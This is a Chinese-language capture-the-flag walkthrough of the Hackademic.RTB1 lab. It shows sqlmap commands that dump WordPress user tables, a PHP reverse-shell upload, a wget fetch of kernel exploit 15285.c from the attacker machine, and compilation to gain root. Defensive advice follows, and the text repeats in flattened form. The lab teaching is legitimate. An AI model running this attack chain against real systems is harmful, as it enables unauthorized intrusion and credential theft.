靶场练习之Hackademic.RTB1
字数 1419 2025-08-10 08:54:01

Hackademic.RTB1 靶场渗透测试教学文档

靶场概述

Hackademic.RTB1 是一个模拟真实环境的渗透测试靶场,目标是获取系统root权限并读取/root/Key.txt文件。靶场运行在Linux系统上,内核版本为2.6.31,运行WordPress网站系统。

渗透测试流程

1. 信息收集

  • 端口扫描:发现22端口(SSH)不可用,80端口(HTTP)开放
  • Web目录扫描:初步扫描未发现敏感目录
  • 网站访问:访问80端口发现WordPress站点,页面提示"Please go to your target and try to get root"

2. Web应用测试

SQL注入发现

  1. 点击"posted in Uncategorized"中的"Uncategorized"链接
  2. 观察URL格式:http://[IP]/Hackademic_RTB1/?cat=1
  3. 测试SQL注入:在URL后添加单引号('),发现报错,确认存在SQL注入漏洞

SQL注入利用

使用sqlmap工具进行自动化注入:

# 枚举数据库
sqlmap -u http://192.168.121.142/Hackademic_RTB1/?cat=1 --dbs

# 发现wordpress数据库后,枚举表
sqlmap -u http://192.168.121.142/Hackademic_RTB1/?cat=1 -D wordpress --tables

# 查看wp_users表结构
sqlmap -u http://192.168.121.142/Hackademic_RTB1/?cat=1 -D wordpress -T wp_users --columns

# 导出wp_users表数据
sqlmap -u http://192.168.121.142/Hackademic_RTB1/?cat=1 -D wordpress -T wp_users --dump

# 使用sqlmap自动破解哈希密码

WordPress后台登录

  1. 通过注入获取的用户名和密码登录WordPress后台:
    • 后台地址:http://[IP]/Hackademic_RTB1/wp-admin/
  2. 识别高权限用户:
    • 检查user_level字段值
    • 或逐个用户尝试登录,高权限用户登录后界面不同
    • 示例高权限用户:GeorgeMiller

3. 获取Web Shell

  1. 在WordPress后台创建或上传PHP文件
  2. 写入反弹shell代码:
    • 可使用工具生成(如hack-tools浏览器扩展)
    • 或使用在线生成工具(如棱角社区)
  3. 确保PHP上传权限已开启(检查WordPress设置)
  4. 上传后访问该PHP文件触发反弹shell

4. 权限提升

  1. 获取初始shell后检查系统信息:
uname -a
# 输出显示内核版本:2.6.31
  1. 搜索内核漏洞:
searchsploit linux 2.6.3
# 发现多个可能的漏洞,如15285.c
  1. 利用内核漏洞提权:

    • 在攻击机(Kali)上启动HTTP服务:
    python3 -m http.server 80
    
    • 在目标机上下载漏洞利用代码:
    wget http://[攻击机IP]/15285.c
    
    • 编译并执行:
    chmod +x 15285.c
    gcc 15285.c -o 15285
    ./15285
    

5. 获取Flag

成功提权至root后,读取目标文件:

cat /root/Key.txt

关键知识点总结

  1. SQL注入识别:通过添加单引号测试输入点
  2. sqlmap使用:自动化SQL注入工具的高级用法
  3. WordPress安全
    • 默认后台地址/wp-admin/
    • 用户权限识别方法
  4. Web Shell上传
    • PHP反弹shell技术
    • 上传权限配置检查
  5. Linux提权技术
    • 内核漏洞识别(uname -a)
    • searchsploit使用
    • 远程下载并编译漏洞利用代码
  6. 网络传输技巧
    • Python简易HTTP服务器
    • wget下载远程文件

防御建议

  1. 防止SQL注入
    • 使用参数化查询
    • 实施输入验证
  2. WordPress安全加固
    • 限制后台访问IP
    • 使用强密码
    • 定期更新插件和主题
  3. 文件上传防护
    • 限制可上传文件类型
    • 禁用PHP执行权限
  4. 系统安全
    • 及时更新内核补丁
    • 实施最小权限原则
    • 监控系统日志

工具清单

  1. sqlmap - SQL注入工具
  2. netcat (nc) - 网络调试与反弹shell监听
  3. searchsploit - 漏洞数据库搜索工具
  4. gcc - C代码编译工具
  5. Python3 - 简易HTTP服务器
  6. wget - 文件下载工具

通过本靶场练习,可以全面掌握从Web应用到系统层面的渗透测试技术链,包括信息收集、漏洞利用、权限提升等关键环节。

Hackademic.RTB1 靶场渗透测试教学文档 靶场概述 Hackademic.RTB1 是一个模拟真实环境的渗透测试靶场,目标是获取系统root权限并读取/root/Key.txt文件。靶场运行在Linux系统上,内核版本为2.6.31,运行WordPress网站系统。 渗透测试流程 1. 信息收集 端口扫描 :发现22端口(SSH)不可用,80端口(HTTP)开放 Web目录扫描 :初步扫描未发现敏感目录 网站访问 :访问80端口发现WordPress站点,页面提示"Please go to your target and try to get root" 2. Web应用测试 SQL注入发现 点击"posted in Uncategorized"中的"Uncategorized"链接 观察URL格式: http://[IP]/Hackademic_RTB1/?cat=1 测试SQL注入:在URL后添加单引号( ' ),发现报错,确认存在SQL注入漏洞 SQL注入利用 使用sqlmap工具进行自动化注入: WordPress后台登录 通过注入获取的用户名和密码登录WordPress后台: 后台地址: http://[IP]/Hackademic_RTB1/wp-admin/ 识别高权限用户: 检查user_ level字段值 或逐个用户尝试登录,高权限用户登录后界面不同 示例高权限用户:GeorgeMiller 3. 获取Web Shell 在WordPress后台创建或上传PHP文件 写入反弹shell代码: 可使用工具生成(如hack-tools浏览器扩展) 或使用在线生成工具(如棱角社区) 确保PHP上传权限已开启(检查WordPress设置) 上传后访问该PHP文件触发反弹shell 4. 权限提升 获取初始shell后检查系统信息: 搜索内核漏洞: 利用内核漏洞提权: 在攻击机(Kali)上启动HTTP服务: 在目标机上下载漏洞利用代码: 编译并执行: 5. 获取Flag 成功提权至root后,读取目标文件: 关键知识点总结 SQL注入识别 :通过添加单引号测试输入点 sqlmap使用 :自动化SQL注入工具的高级用法 WordPress安全 : 默认后台地址/wp-admin/ 用户权限识别方法 Web Shell上传 : PHP反弹shell技术 上传权限配置检查 Linux提权技术 : 内核漏洞识别(uname -a) searchsploit使用 远程下载并编译漏洞利用代码 网络传输技巧 : Python简易HTTP服务器 wget下载远程文件 防御建议 防止SQL注入 : 使用参数化查询 实施输入验证 WordPress安全加固 : 限制后台访问IP 使用强密码 定期更新插件和主题 文件上传防护 : 限制可上传文件类型 禁用PHP执行权限 系统安全 : 及时更新内核补丁 实施最小权限原则 监控系统日志 工具清单 sqlmap - SQL注入工具 netcat (nc) - 网络调试与反弹shell监听 searchsploit - 漏洞数据库搜索工具 gcc - C代码编译工具 Python3 - 简易HTTP服务器 wget - 文件下载工具 通过本靶场练习,可以全面掌握从Web应用到系统层面的渗透测试技术链,包括信息收集、漏洞利用、权限提升等关键环节。